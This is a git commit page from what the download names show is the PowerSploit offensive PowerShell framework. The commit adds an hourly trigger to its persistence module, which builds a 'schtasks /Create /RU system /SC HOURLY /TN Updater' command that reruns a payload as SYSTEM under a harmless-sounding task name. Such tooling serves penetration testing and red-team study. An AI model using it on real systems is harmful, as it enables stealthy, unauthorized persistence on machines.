Added ScheduledTaskHourly to New-ElevatedPersistenceOption

author: pyllyukko <pyllyukko@maimed.org> 2016-04-16 15:44:05 +0300
committer: pyllyukko <pyllyukko@maimed.org> 2016-04-16 17:03:17 +0300
commit: a6564f44833fa6fbbc8d05f337781abf03f05e44 (patch)
tree: 6aa35351e2c9ef4e114c820465f04a0ca8f92187 /Persistence/Persistence.psm1
parent: 2a813faedb853d8043446c6d0cad2119ecd62d61 (diff)
download: PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.tar.gz
PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.zip
1 files changed, 20 insertions, 0 deletions
diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1
index b27b981..b957cb7 100644
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption
 
     Starts the payload daily.
 
+.PARAMETER Hourly
+
+    Starts the payload hourly.
+
 .PARAMETER At
 
     Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption
         $PermanentWMI,
 
         [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
         [Switch]
@@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption
         [Switch]
         $Daily,
 
+        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
+        [Switch]
+        $Hourly,
+
         [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
         [DateTime]
@@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption
             $PersistenceOptionsTable['Time'] = $At
         }
 
+        'ScheduledTaskHourly'
+        {
+            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+            $PersistenceOptionsTable['Trigger'] = 'Hourly'
+        }
+
         'Registry'
         {
             $PersistenceOptionsTable['Method'] = 'Registry'
@@ -574,6 +589,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
                     $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
                 }
 
+                'Hourly'
+                {
+                    $ElevatedTrigger = "schtasks /Create /RU system /SC HOURLY /TN Updater /TR "
+                }
+
                 'OnIdle'
                 {
                     $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "
author	pyllyukko <pyllyukko@maimed.org>	2016-04-16 15:44:05 +0300
committer	pyllyukko <pyllyukko@maimed.org>	2016-04-16 17:03:17 +0300
commit	a6564f44833fa6fbbc8d05f337781abf03f05e44 (patch)
tree	6aa35351e2c9ef4e114c820465f04a0ca8f92187 /Persistence/Persistence.psm1
parent	2a813faedb853d8043446c6d0cad2119ecd62d61 (diff)
download	PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.tar.gz PowerSploit-a6564f44833fa6fbbc8d05f337781abf03f05e44.zip